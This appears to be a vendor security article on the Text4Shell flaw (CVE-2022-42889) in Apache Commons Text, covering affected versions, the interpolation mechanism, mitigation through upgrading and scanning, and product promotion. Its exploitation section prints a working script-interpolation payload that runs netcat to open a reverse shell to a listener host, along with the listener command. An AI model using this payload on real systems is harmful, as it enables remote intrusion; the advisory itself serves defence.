Apache Commons Text is a library focused on working with string algorithms. On October 13, 2022, a new vulnerability, CVE-2022-42889, that could lead to remote code execution (RCE) was disclosed.
Security researcher Alvaro Muoz, who first reported the vulnerability, said the library’s default interpolators (specifically the StringSubstitutor class) made script evaluation insecure, meaning that using a library in its default configuration can lead to the execution of unwanted malicious code.
Because the library is widely used by the public, this new RCE flaw poses a threat to many organizations around the world. CVE-2022-42889 has a severity of 9.8 on the CVSS scale, indicating it is a very serious threat.
This is part of a series of articles about supply chain security.
In this article:
- Who Is Impacted By Text4Shell?
- How Text4Shell Vulnerability Works
- How to Exploit CVE-2022-42889
- Text4Shell Mitigation Recommendations
Who Is Impacted By Text4Shell?
Applications that use or depend on the Apache Commons Text library are affected—but not all applications. In addition to having a vulnerable version of Apache Commons Text, the application code must have a certain vulnerable pattern.
Text4Shell can only be exploited if the target system is running certain default interpolators in versions 1.5-1.9 (inclusive) of Apache Commons Text. String interpolation is the practice of mixing strings and integers to build new strings, and is a common threat vector in applications.
The Text4Shell vulnerability only occurs if the application imports org.apache.commons.text.StringSubstitutor and uses one these default interpolators:
- script—evalutes expressions using JVM script execution engine (
javax.script). - dns—resolves DNS records
- url—used to request information from a URL
How Text4Shell Vulnerability Works
Apache Commons Text is an open source library for performing various text manipulations. The Apache Software Foundation (ASF) describes this library as providing additional functionality for text processing in the standard Java Development Kit (JDK).
The security flaw affects Apache Commons Text versions 1.5 through 1.9. A PoC for CVE-2022-42889 has been published, but there are no known cases of the vulnerability being exploited.
The Apache Software Foundation released an Apache Commons Text released a security advisory detailing how to fix the threat. According to the bulletin, CVE-2022-42889 is the result of a variable interpolation process performed by the library. In library versions 1.5 through 1.9, the default set of lookup instances (e.g. “script”, “dns”, “url”) contain interpolators that can cause remote code execution.
Cybersecurity researchers added that users running Java 15 or later can avoid the risk because script interpolation is not applied, but the vulnerability could still be exploited through other vectors such as DNS or malicious URLs.
How to Exploit CVE-2022-42889
The exploitable component was placed in a Docker container and made available to an EC2 instance under the hacker’s control to reproduce the attack.
Additionally, the netcat (nc) program allows us to establish a reverse shell communication with the susceptible software. The susceptible web app provides access to a search API, and the StringSubstitutor library from Commons Text is used to interpolate the query:
http://web.app/text4shell/attack?search=<query>
The following payload is one possible exploit for this vulnerability, which would result in a reverse shell being opened:
${script:javascript:java.lang.Runtime.getRuntime().exec('nc 192.168.49.1 9090 -e /bin/sh')}
The above payload consists of ${prefix:name} that activates String searching. As stated previously, script, dns, and url can be employed as the prefix to attack the sensitivity. Before executing the constructed request, we must establish the reverse shell link by listening on port 9090 with the netcat (nc) command.
nc -nlvp 9090
We can now submit the constructed request with the payload URL encoded, as demonstrated below. It results in the attacker being able to establish a link to the vulnerable software.
Since this vulnerability has been exploited, the attacker can now gain root access to the vulnerable system and install malicious software.
Text4Shell Mitigation Recommendations
If you are using a vulnerable version of Apache Commons Text (1.5-1.9), the first step is to upgrade the library to a patched version (1.10 or later).
Like the previous CVE-2022-22963 vulnerability, this new vulnerability can be detected in three phases of the application lifecycle.
- In the build process using a software composition analysis (SCA) tool.
- In the deployment process using an image scanner on the Kubernetes admission controller.
- During runtime—using a runtime discovery engine like Aqua.
Connect your repository to Aqua Cloud Native Security Platform to detect this vulnerability in your environment. This will automatically map your dependencies and identify any vulnerable dependencies your project uses.
You can also identify and block all workloads and have this vulnerability, or prevent their execution, using Aqua’s assurance policies feature. Aqua provides a vulnerability scanner you can include as part of your CI/CD pipeline, which automatically identifies and blocks new builds with Text4Shell vulnerabilities.
